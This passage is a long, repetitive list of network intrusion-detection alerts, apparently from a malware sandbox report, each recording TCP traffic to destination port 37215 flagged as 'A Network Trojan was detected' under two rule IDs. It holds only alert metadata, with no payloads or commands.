                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498974
                SID:2835222
                Source Port:39420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227594
                SID:2835222
                Source Port:54882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686878
                SID:2835222
                Source Port:46280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166659
                SID:2835222
                Source Port:42048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236762
                SID:2829579
                Source Port:38496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824173
                SID:2829579
                Source Port:58400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819099
                SID:2829579
                Source Port:41222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521663
                SID:2835222
                Source Port:56522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532409
                SID:2835222
                Source Port:37506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.655677
                SID:2835222
                Source Port:35046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666481
                SID:2835222
                Source Port:55032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765166
                SID:2835222
                Source Port:38698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277453
                SID:2829579
                Source Port:37768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.744563
                SID:2829579
                Source Port:45846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266600
                SID:2829579
                Source Port:35902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653698
                SID:2829579
                Source Port:45556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862511
                SID:2829579
                Source Port:60418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618047
                SID:2835222
                Source Port:59234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287101
                SID:2829579
                Source Port:60054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.457663
                SID:2835222
                Source Port:41754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787531
                SID:2835222
                Source Port:51826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015618
                SID:2829579
                Source Port:54314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522835
                SID:2829579
                Source Port:36954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583054
                SID:2835222
                Source Port:37328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731731
                SID:2835222
                Source Port:59344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856368
                SID:2835222
                Source Port:35692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.034120
                SID:2829579
                Source Port:41282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614020
                SID:2829579
                Source Port:57660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466580
                SID:2835222
                Source Port:57578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440932
                SID:2829579
                Source Port:40372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519923
                SID:2829579
                Source Port:42154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461863
                SID:2829579
                Source Port:43768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513089
                SID:2835222
                Source Port:52160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522871
                SID:2835222
                Source Port:58574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628145
                SID:2835222
                Source Port:44560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848922
                SID:2829579
                Source Port:40832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272330
                SID:2829579
                Source Port:48460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207479
                SID:2829579
                Source Port:39318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667835
                SID:2835222
                Source Port:42860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779472
                SID:2835222
                Source Port:55780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.719767
                SID:2829579
                Source Port:51238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.234121
                SID:2829579
                Source Port:35766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222748
                SID:2829579
                Source Port:49292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573369
                SID:2835222
                Source Port:50652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559013
                SID:2829579
                Source Port:45646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787461
                SID:2829579
                Source Port:51438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883980
                SID:2829579
                Source Port:41226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316537
                SID:2835222
                Source Port:55046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418879
                SID:2835222
                Source Port:57292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910847
                SID:2835222
                Source Port:48380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965334
                SID:2829579
                Source Port:46078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317182
                SID:2829579
                Source Port:36472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171423
                SID:2835222
                Source Port:37044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810066
                SID:2835222
                Source Port:59830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276846
                SID:2829579
                Source Port:40098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685670
                SID:2835222
                Source Port:34428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956211
                SID:2835222
                Source Port:33608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233710
                SID:2829579
                Source Port:40540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689138
                SID:2835222
                Source Port:41900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.609989
                SID:2835222
                Source Port:32956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141841
                SID:2829579
                Source Port:57466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361695
                SID:2835222
                Source Port:41592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.127719
                SID:2835222
                Source Port:55394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663852
                SID:2829579
                Source Port:41432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336224
                SID:2835222
                Source Port:57630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929851
                SID:2835222
                Source Port:41872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217064
                SID:2829579
                Source Port:50876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166141
                SID:2835222
                Source Port:47818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462471
                SID:2835222
                Source Port:39804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662060
                SID:2835222
                Source Port:57642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361504
                SID:2835222
                Source Port:46722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584384
                SID:2835222
                Source Port:35816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785052
                SID:2829579
                Source Port:46112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908714
                SID:2835222
                Source Port:40468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267627
                SID:2835222
                Source Port:36480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316122
                SID:2829579
                Source Port:34848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.079043
                SID:2829579
                Source Port:56720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025183
                SID:2829579
                Source Port:50614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610874
                SID:2829579
                Source Port:51250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001050
                SID:2829579
                Source Port:51148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583961
                SID:2829579
                Source Port:55300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.436925
                SID:2835222
                Source Port:35292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770762
                SID:2829579
                Source Port:59236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559171
                SID:2835222
                Source Port:44652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726459
                SID:2829579
                Source Port:59264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421894
                SID:2835222
                Source Port:52322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069745
                SID:2829579
                Source Port:52618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968384
                SID:2835222
                Source Port:35812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739675
                SID:2829579
                Source Port:57896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171917
                SID:2835222
                Source Port:50708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719590
                SID:2835222
                Source Port:45648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651884
                SID:2835222
                Source Port:48730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169433
                SID:2829579
                Source Port:40310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882973
                SID:2829579
                Source Port:60412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559134
                SID:2835222
                Source Port:34328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321532
                SID:2835222
                Source Port:48822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521031
                SID:2829579
                Source Port:45242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897189
                SID:2835222
                Source Port:34494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845771
                SID:2829579
                Source Port:43394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025354
                SID:2829579
                Source Port:38912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043350
                SID:2829579
                Source Port:36556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962691
                SID:2835222
                Source Port:57114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520592
                SID:2829579
                Source Port:52478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767666
                SID:2829579
                Source Port:44412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624853
                SID:2835222
                Source Port:49690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926754
                SID:2835222
                Source Port:39214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362700
                SID:2835222
                Source Port:38614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587157
                SID:2835222
                Source Port:47788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.816193
                SID:2835222
                Source Port:35082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570676
                SID:2835222
                Source Port:42612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721728
                SID:2829579
                Source Port:51822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773674
                SID:2835222
                Source Port:38900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.538350
                SID:2829579
                Source Port:48644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025256
                SID:2829579
                Source Port:57638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840834
                SID:2829579
                Source Port:53664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509660
                SID:2835222
                Source Port:39330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941514
                SID:2829579
                Source Port:37866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133368
                SID:2829579
                Source Port:35896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.391728
                SID:2829579
                Source Port:60874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786800
                SID:2835222
                Source Port:45840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556114
                SID:2829579
                Source Port:35032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668621
                SID:2829579
                Source Port:42362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155585
                SID:2835222
                Source Port:43626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227055
                SID:2829579
                Source Port:56146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419857
                SID:2829579
                Source Port:54492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032682
                SID:2829579
                Source Port:37812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025387
                SID:2829579
                Source Port:51626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655616
                SID:2835222
                Source Port:45146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463135
                SID:2829579
                Source Port:44978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574656
                SID:2829579
                Source Port:59664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716067
                SID:2829579
                Source Port:45902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928228
                SID:2835222
                Source Port:47430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626741
                SID:2829579
                Source Port:39942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583299
                SID:2835222
                Source Port:34330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224779
                SID:2829579
                Source Port:55356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559694
                SID:2835222
                Source Port:50434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663771
                SID:2829579
                Source Port:55972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264813
                SID:2835222
                Source Port:55206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175925
                SID:2835222
                Source Port:47754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997349
                SID:2835222
                Source Port:42248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824045
                SID:2829579
                Source Port:35648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.714614
                SID:2829579
                Source Port:34436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790826
                SID:2829579
                Source Port:41528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867714
                SID:2829579
                Source Port:44660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681768
                SID:2829579
                Source Port:43290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550889
                SID:2835222
                Source Port:42888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957770
                SID:2829579
                Source Port:56876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364204
                SID:2829579
                Source Port:51762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328514
                SID:2835222
                Source Port:51706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171060
                SID:2829579
                Source Port:42702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881217
                SID:2835222
                Source Port:49794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262579
                SID:2835222
                Source Port:46088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.649434
                SID:2829579
                Source Port:56292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611131
                SID:2835222
                Source Port:46678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531324
                SID:2829579
                Source Port:44332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947166
                SID:2829579
                Source Port:50562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364788
                SID:2829579
                Source Port:38534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860421
                SID:2829579
                Source Port:37958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667837
                SID:2829579
                Source Port:34438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713973
                SID:2835222
                Source Port:57818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512263
                SID:2835222
                Source Port:49614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465494
                SID:2829579
                Source Port:48128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263939
                SID:2835222
                Source Port:34766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283238
                SID:2835222
                Source Port:40846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286625
                SID:2829579
                Source Port:38368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614807
                SID:2829579
                Source Port:59190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977294
                SID:2835222
                Source Port:43404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.589351
                SID:2835222
                Source Port:41202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941848
                SID:2829579
                Source Port:41500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964665
                SID:2829579
                Source Port:38256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867593
                SID:2829579
                Source Port:47422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843808
                SID:2835222
                Source Port:39126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899516
                SID:2835222
                Source Port:54546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.820408
                SID:2829579
                Source Port:55556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731051
                SID:2829579
                Source Port:40524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.132972
                SID:2829579
                Source Port:46676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916189
                SID:2829579
                Source Port:37248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222052
                SID:2829579
                Source Port:52660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361397
                SID:2835222
                Source Port:50478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289868
                SID:2835222
                Source Port:44904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618530
                SID:2835222
                Source Port:52784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584900
                SID:2829579
                Source Port:56432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.230743
                SID:2829579
                Source Port:41780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231263
                SID:2835222
                Source Port:46838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473418
                SID:2829579
                Source Port:57962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442706
                SID:2835222
                Source Port:39466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919652
                SID:2829579
                Source Port:55652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372367
                SID:2835222
                Source Port:35670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557895
                SID:2835222
                Source Port:37746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655265
                SID:2835222
                Source Port:35854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435824
                SID:2829579
                Source Port:46684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864507
                SID:2835222
                Source Port:58284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155684
                SID:2835222
                Source Port:56742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435015
                SID:2829579
                Source Port:38804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944066
                SID:2835222
                Source Port:41220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282305
                SID:2835222
                Source Port:35002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.224452
                SID:2829579
                Source Port:50218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
